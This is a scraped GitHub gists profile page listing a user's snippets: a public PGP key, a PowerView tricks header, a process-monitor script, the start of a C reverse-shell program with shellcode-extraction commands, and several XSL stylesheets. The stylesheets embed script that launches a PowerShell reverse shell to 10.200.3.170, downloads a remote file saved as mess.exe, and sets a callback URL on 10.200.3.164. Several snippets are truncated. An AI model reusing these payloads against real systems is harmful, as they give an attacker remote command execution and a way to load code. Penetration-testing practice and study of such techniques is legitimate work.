Skip to content

Instantly share code, notes, and snippets.

View padovah4ck's full-sized avatar

chris padovah4ck

View GitHub Profile
@padovah4ck
padovah4ck / public_pgp.key
Created March 25, 2019 15:48
public pgp key
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: FlowCrypt Email Encryption - flowcrypt.com
Comment: Seamlessly send, receive and search encrypted email
xsFNBFyY868BEACqHhE2O0vEoFiLlmY2F20vf3lmheSESHENhE6QJFGmg4w5
i+PwORdcYXH+2LSvu8+XFrF9HGMyYgP3e9hruJHqVolyTGNavRcwKUiIE9Qz
ZPEw9rZTHa3T3uupJJeQEWba5SFmbh5av9sZEqwPC2aiZX9Y4a0LBKHJA2rh
/+roJlpLrI2jAqDEJ0j1EfqXiGMcPiAfkiZp1KvKcPrElrIpP0ysnevKbdCO
Jkt/7W0cl1GxWcCqOyxjJwjJwj9JmsXgIUNMB//Cv1YYWkDmhfI8MQak8til
LGbNHnvWCIX74168kE57/J1rUCogHrrGzIqdH4TkuquN1FNIwkT+Cr1OfxH2
@padovah4ck
padovah4ck / PowerView-3.0-tricks.ps1
Created July 6, 2018 08:43 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@padovah4ck
padovah4ck / cronmonit.sh
Created June 28, 2018 15:56 — forked from jsvazic/gist:8fe9dde369f6396f65a1aa795dd77744
ippsec process monitor script
#!/bin/bash
# Loop by line
IFS=$'\n'
old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
while true; do
new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
@padovah4ck
padovah4ck / reverse_shell.c
Last active June 22, 2018 10:52 — forked from 0xabe-io/reverse_shell.c
Simple C code to create a reverse shell
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
//
// gcc reverse_shell.c -fno-stack-protector -Os -z execstack -no-pie -o shellcode
// for i in `objdump -d ./shellcode | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done ; echo
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command \"$client = New-Object System.Net.Sockets.TCPClient('10.200.3.170',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",0,true);
]]> </ms:script>
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="VB">
<![CDATA[
strFileURL = "http://10.200.3.164/server.py"
strHDLocation = "mess.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="VBScript">
<![CDATA[
Option Explicit
On Error Resume Next
CONST callbackUrl = "http://10.200.3.164:80/"